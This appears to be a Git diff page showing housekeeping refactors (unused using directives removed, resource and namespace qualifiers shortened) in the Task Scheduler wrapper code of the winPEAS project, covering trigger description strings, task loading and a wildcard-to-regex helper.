using winPEAS.TaskScheduler.V1;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
|
||||
@@ -2,10 +2,7 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -2,10 +2,7 @@
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
using winPEAS.TaskScheduler.V2;
|
||||
|
||||
@@ -718,7 +715,7 @@ namespace winPEAS.TaskScheduler
|
||||
}
|
||||
else
|
||||
{
|
||||
taskPath = System.IO.Path.GetFileNameWithoutExtension(taskPath);
|
||||
taskPath = Path.GetFileNameWithoutExtension(taskPath);
|
||||
var iTask = GetTask(v1TaskScheduler, taskPath);
|
||||
if (iTask != null)
|
||||
t = new Task(this, iTask);
|
||||
@@ -746,7 +743,7 @@ namespace winPEAS.TaskScheduler
|
||||
public TaskDefinition NewTaskFromFile([NotNull] string xmlFile)
|
||||
{
|
||||
var td = NewTask();
|
||||
td.XmlText = System.IO.File.ReadAllText(xmlFile);
|
||||
td.XmlText = File.ReadAllText(xmlFile);
|
||||
return td;
|
||||
}
|
||||
|
||||
|
||||
@@ -2,11 +2,9 @@
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Globalization;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.Properties;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
@@ -217,7 +215,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => Properties.Resources.TriggerBoot1;
|
||||
protected override string V2GetTriggerString() => Resources.TriggerBoot1;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -419,8 +417,8 @@ namespace winPEAS.TaskScheduler
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => DaysInterval == 1 ?
|
||||
string.Format(Properties.Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
|
||||
string.Format(Properties.Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
|
||||
string.Format(Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
|
||||
string.Format(Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
|
||||
|
||||
private void ReadMyXml(System.Xml.XmlReader reader)
|
||||
{
|
||||
@@ -633,13 +631,13 @@ namespace winPEAS.TaskScheduler
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
if (!GetBasic(out var log, out var source, out var id))
|
||||
return Properties.Resources.TriggerEvent1;
|
||||
return Resources.TriggerEvent1;
|
||||
var sb = new StringBuilder();
|
||||
sb.AppendFormat(Properties.Resources.TriggerEventBasic1, log);
|
||||
sb.AppendFormat(Resources.TriggerEventBasic1, log);
|
||||
if (!string.IsNullOrEmpty(source))
|
||||
sb.AppendFormat(Properties.Resources.TriggerEventBasic2, source);
|
||||
sb.AppendFormat(Resources.TriggerEventBasic2, source);
|
||||
if (id.HasValue)
|
||||
sb.AppendFormat(Properties.Resources.TriggerEventBasic3, id.Value);
|
||||
sb.AppendFormat(Resources.TriggerEventBasic3, id.Value);
|
||||
return sb.ToString();
|
||||
}
|
||||
}
|
||||
@@ -674,7 +672,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => Properties.Resources.TriggerIdle1;
|
||||
protected override string V2GetTriggerString() => Resources.TriggerIdle1;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -761,8 +759,8 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
|
||||
return string.Format(Properties.Resources.TriggerLogon1, user);
|
||||
var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
|
||||
return string.Format(Resources.TriggerLogon1, user);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -971,7 +969,7 @@ namespace winPEAS.TaskScheduler
|
||||
var ww = TaskEnumGlobalizer.GetString(WeeksOfMonth);
|
||||
var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
|
||||
var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
|
||||
return string.Format(Properties.Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
|
||||
return string.Format(Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
|
||||
}
|
||||
|
||||
/// <summary>Reads the subclass XML for V1 streams.</summary>
|
||||
@@ -1249,11 +1247,11 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var days = string.Join(Properties.Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
|
||||
var days = string.Join(Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
|
||||
if (RunOnLastDayOfMonth)
|
||||
days += (days.Length == 0 ? "" : Properties.Resources.ListSeparator) + Properties.Resources.WWLastWeek;
|
||||
days += (days.Length == 0 ? "" : Resources.ListSeparator) + Resources.WWLastWeek;
|
||||
var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
|
||||
return string.Format(Properties.Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
|
||||
return string.Format(Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -1428,7 +1426,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => Properties.Resources.TriggerRegistration1;
|
||||
protected override string V2GetTriggerString() => Resources.TriggerRegistration1;
|
||||
}
|
||||
|
||||
/// <summary>Defines how often the task is run and how long the repetition pattern is repeated after the task is started.</summary>
|
||||
@@ -1770,10 +1768,10 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var str = Properties.Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
|
||||
var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
|
||||
var str = Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
|
||||
var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
|
||||
if (StateChange != TaskSessionStateChangeType.SessionLock && StateChange != TaskSessionStateChangeType.SessionUnlock)
|
||||
user = string.Format(Properties.Resources.TriggerSessionUserSession, user);
|
||||
user = string.Format(Resources.TriggerSessionUserSession, user);
|
||||
return string.Format(str, user);
|
||||
}
|
||||
|
||||
@@ -1839,7 +1837,7 @@ namespace winPEAS.TaskScheduler
|
||||
|
||||
/// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
|
||||
/// <returns>String describing the trigger.</returns>
|
||||
protected override string V2GetTriggerString() => string.Format(Properties.Resources.TriggerTime1, AdjustToLocal(StartBoundary));
|
||||
protected override string V2GetTriggerString() => string.Format(Resources.TriggerTime1, AdjustToLocal(StartBoundary));
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
@@ -1946,7 +1944,7 @@ namespace winPEAS.TaskScheduler
|
||||
if (v2Trigger != null)
|
||||
{
|
||||
if (value <= StartBoundary)
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
v2Trigger.EndBoundary = value == DateTime.MaxValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
|
||||
}
|
||||
else
|
||||
@@ -2063,7 +2061,7 @@ namespace winPEAS.TaskScheduler
|
||||
if (v2Trigger != null)
|
||||
{
|
||||
if (value > EndBoundary)
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
v2Trigger.StartBoundary = value == DateTime.MinValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
|
||||
}
|
||||
else
|
||||
@@ -2381,7 +2379,7 @@ namespace winPEAS.TaskScheduler
|
||||
v2Trigger = iTriggers.Create(ttype);
|
||||
Marshal.ReleaseComObject(iTriggers);
|
||||
if ((unboundValues.TryGetValue("StartBoundary", out var dt) ? (DateTime)dt : StartBoundary) > (unboundValues.TryGetValue("EndBoundary", out dt) ? (DateTime)dt : EndBoundary))
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
foreach (var key in unboundValues.Keys)
|
||||
{
|
||||
try
|
||||
@@ -2406,7 +2404,7 @@ namespace winPEAS.TaskScheduler
|
||||
if (v1TriggerData.MinutesInterval != 0 && v1TriggerData.MinutesInterval >= v1TriggerData.MinutesDuration)
|
||||
throw new ArgumentException("Trigger.Repetition.Interval must be less than Trigger.Repetition.Duration under Task Scheduler 1.0.");
|
||||
if (v1TriggerData.EndDate <= v1TriggerData.BeginDate)
|
||||
throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
|
||||
throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
|
||||
if (v1TriggerData.BeginDate == DateTime.MinValue)
|
||||
v1TriggerData.BeginDate = DateTime.Now;
|
||||
v1Trigger?.SetTrigger(ref v1TriggerData);
|
||||
@@ -2456,13 +2454,13 @@ namespace winPEAS.TaskScheduler
|
||||
var ret = new StringBuilder();
|
||||
if (Repetition.Interval != TimeSpan.Zero)
|
||||
{
|
||||
var sduration = Repetition.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
|
||||
ret.AppendFormat(Properties.Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
|
||||
var sduration = Repetition.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
|
||||
ret.AppendFormat(Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
|
||||
}
|
||||
if (EndBoundary != DateTime.MaxValue)
|
||||
ret.AppendFormat(Properties.Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
|
||||
ret.AppendFormat(Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
|
||||
if (ret.Length > 0)
|
||||
ret.Insert(0, Properties.Resources.HyphenSeparator);
|
||||
ret.Insert(0, Resources.HyphenSeparator);
|
||||
return ret.ToString();
|
||||
}
|
||||
}
|
||||
@@ -2609,7 +2607,7 @@ namespace winPEAS.TaskScheduler
|
||||
protected override string V2GetTriggerString()
|
||||
{
|
||||
var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
|
||||
return string.Format(WeeksInterval == 1 ? Properties.Resources.TriggerWeekly1Week : Properties.Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
|
||||
return string.Format(WeeksInterval == 1 ? Resources.TriggerWeekly1Week : Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
|
||||
}
|
||||
|
||||
/// <summary>Reads the subclass XML for V1 streams.</summary>
|
||||
@@ -2775,8 +2773,8 @@ namespace winPEAS.TaskScheduler
|
||||
var rp = (RepetitionPattern)value;
|
||||
if (destinationType != typeof(string)) return base.ConvertTo(context, culture, value, destinationType);
|
||||
if (rp.Interval == TimeSpan.Zero) return "";
|
||||
var sduration = rp.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
|
||||
return string.Format(Properties.Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
|
||||
var sduration = rp.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
|
||||
return string.Format(Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -3,11 +3,8 @@ using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.Collections.Specialized;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml.Serialization;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
using winPEAS.TaskScheduler.V1;
|
||||
|
||||
@@ -1,9 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
|
||||
@@ -1,9 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
@@ -30,12 +25,12 @@ namespace winPEAS.TaskScheduler
|
||||
/// <returns>A regular expression equivalent of the given wildcard.</returns>
|
||||
public static string WildcardToRegex([NotNull] string pattern)
|
||||
{
|
||||
string s = Regex.Escape(pattern);
|
||||
s = Regex.Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
|
||||
s = Regex.Replace(s, @"\\\\\\\*", @"\*");
|
||||
s = Regex.Replace(s, @"(?<!\\)\\\?", @"."); // Negative Lookbehind
|
||||
s = Regex.Replace(s, @"\\\\\\\?", @"\?");
|
||||
return string.Concat("^", Regex.Replace(s, @"\\\\\\\\", @"\\"), "$");
|
||||
string s = Escape(pattern);
|
||||
s = Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
|
||||
s = Replace(s, @"\\\\\\\*", @"\*");
|
||||
s = Replace(s, @"(?<!\\)\\\?", @"."); // Negative Lookbehind
|
||||
s = Replace(s, @"\\\\\\\?", @"\?");
|
||||
return string.Concat("^", Replace(s, @"\\\\\\\\", @"\\"), "$");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,14 +1,9 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Classes;
|
||||
using winPEAS.TaskScheduler.TaskEditor.Native;
|
||||
|
||||
namespace winPEAS.TaskScheduler
|
||||
{
|
||||
|
||||
@@ -1,10 +1,8 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
using System.Xml;
|
||||
using System.Xml.Serialization;
|
||||
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
using System;
|
||||
using System.ComponentModel;
|
||||
using System.ComponentModel;
|
||||
using System.Diagnostics;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace winPEAS.Wifi.NativeWifiApi
|
||||
{
|
||||
|
||||
Reference in New Issue
Block a user